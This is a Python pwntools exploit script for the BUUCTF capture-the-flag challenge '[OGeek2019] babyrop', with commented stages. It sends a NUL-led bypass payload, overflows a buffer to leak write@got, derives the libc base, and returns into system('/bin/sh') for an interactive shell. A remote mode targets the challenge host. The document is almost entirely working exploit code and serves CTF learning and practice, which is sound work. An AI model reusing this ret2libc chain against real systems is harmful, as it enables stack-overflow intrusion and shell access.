buuctf@[OGeek2019]babyrop
2024-09-05 13:29:32
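#!/usr/bin/python
# coding:utf-8
"""Exploit for BUUCTF [OGeek2019] babyrop: 32-bit ret2libc in three stages.

Stage 1 sends a check-bypass payload (a leading NUL followed by 0xff bytes)
that the program answers with "Correct\\n" and that unlocks a long read().
Stage 2 overflows that read() into write(1, write@got, 4) and returns to
main, leaking a libc address from which the libc base is derived.
Stage 3 repeats the bypass and returns into system("/bin/sh").

The overflow distance and main address are specific to this binary; the
libc offsets are taken from the libc shipped with the challenge.  The
script targets Python 2 pwntools (raw_input in debug()), but the payloads
are written as byte literals so they read the same on Python 3.

Usage: python exploit.py          # local, with libc-2.23.so preloaded
       python exploit.py remote   # attack the BUUCTF instance
"""
import sys

from pwn import *

# context.log_level = 'debug'  # uncomment to trace every byte sent/received

BINARY = './pwn'
LIBC_PATH = './libc-2.23.so'

elf = ELF(BINARY)
libc = ELF(LIBC_PATH)
context.binary = elf  # arch/bits for p32()/u32() and for gdb.attach()

if len(sys.argv) > 1 and sys.argv[1] == 'remote':
    io = remote('node1.buuoj.cn', 28034)
else:
    # LD_PRELOAD swaps in the challenge libc locally so the leaked offsets
    # match the remote target.  NOTE(review): the system ld.so must be
    # compatible with libc 2.23 or the process dies at startup.
    io = process(BINARY, env={"LD_PRELOAD": LIBC_PATH})

write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']
# Binary has no PIE, so main is at a fixed address.  Prefer the symbol if
# the binary is not stripped; fall back to the hand-recovered constant.
main_addr = elf.symbols.get('main', 0x08048825)

# Bytes from the start of the overflowed buffer to the saved EBP; +4 more
# skips the saved EBP itself and lands on the saved return address.
OVERFLOW_OFFSET = 0xE7

# Leading NUL presumably makes the program's string comparison succeed
# (zero compared length) and the 0xff byte becomes the length of the
# following read() -- confirm against the binary if porting.
BYPASS_PAYLOAD = b"\x00" + b"\xff" * 7


def debug():
    """Attach gdb to the running target at a breakpoint address typed on stdin."""
    global io
    addr = raw_input("[+]debug:")  # Python 2; use input() on Python 3
    gdb.attach(io, "b *" + addr)


def pass_check():
    """Send the check-bypass payload and wait for the program's "Correct" reply."""
    io.sendline(BYPASS_PAYLOAD)
    io.recvuntil(b"Correct\n")


def leak_libc_base():
    """Overflow into write(1, write@got, 4), return to main, return the libc base.

    Raises:
        PwnlibException (via log.error) when the derived base is not
        page-aligned, which means the leak or the libc file is wrong.
    """
    rop = b''.join([
        b'A' * (OVERFLOW_OFFSET + 4),
        p32(write_plt_addr),
        p32(main_addr),       # write() returns into main for stage 3
        p32(1),               # fd  = stdout
        p32(write_got_addr),  # buf = GOT slot holding write@libc
        p32(4),               # len = one 32-bit pointer
    ])
    io.sendline(rop)

    # recv(4) may return fewer than 4 bytes on a short read and u32() then
    # raises; recvn(4) blocks until exactly 4 bytes have arrived.
    write_addr = u32(io.recvn(4))
    log.info("write@libc     : %#x", write_addr)

    libc_base = write_addr - libc.symbols['write']
    if libc_base & 0xfff:
        log.error("libc base %#x is not page-aligned: bad leak or wrong libc", libc_base)
    log.info("libc base      : %#x", libc_base)
    return libc_base


def get_shell(libc_base):
    """Repeat the check bypass, then overflow into system("/bin/sh")."""
    system_addr = libc_base + libc.symbols['system']
    # Search the libc we actually loaded instead of trusting a hand-copied
    # libc-database offset (the original used 0x15902b for this libc).
    bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
    log.info("system@libc    : %#x", system_addr)
    log.info("\"/bin/sh\"@libc : %#x", bin_sh_addr)

    pass_check()
    rop = b''.join([
        b'A' * (OVERFLOW_OFFSET + 4),
        p32(system_addr),
        b'AAAA',           # fake return address for system(); never used
        p32(bin_sh_addr),  # first argument of system()
    ])
    # debug()  # uncomment to break before the final overflow is sent
    io.sendline(rop)


pass_check()
get_shell(leak_libc_base())
io.interactive()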